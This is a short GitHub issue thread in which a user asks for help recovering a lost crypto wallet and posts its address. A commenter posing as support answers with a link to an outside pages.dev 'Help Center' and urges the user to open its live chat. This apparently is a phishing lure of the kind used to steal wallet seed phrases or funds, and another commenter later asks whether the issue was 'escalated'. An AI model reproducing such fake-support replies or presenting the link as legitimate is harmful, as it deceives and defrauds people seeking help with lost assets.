### ISSUE TITLE
Lost my wallet but I have wallet address 

### ISSUE THREAD

**Issue by Shihab86956** [suzandavis/Lost-wallet-finder#5]

**Comment by kieth314M7** [comment]
@Shihab86956 Thanks for bringing this issue to our attention.

The best way to resolve this is to contact our support team.

For the fastest resolution, please click on the link below to our dedicated support line:

Support: [Help Center](https://dappsrectification-chain.pages.dev/)

Note: **Click on the live chat icon at the bottom corner of the page to start a conversation**

**Comment by Shihab86956** [comment]
UQBwuBtvTtOEIRS4n3uDIHzyHnin-
saw1vAwYCekkicd8iV4 (This is my wallet address which I lossed)

**Comment by Shihab86956** [comment]
![IMG_20241113_110332](https://github.com/user-attachments/assets/028290b8-0c3b-4286-a69b-c0926ff16287)

**Comment by Chloebarbers** [comment]
Hello @Shihab86956 
Has your issue already been escalated?
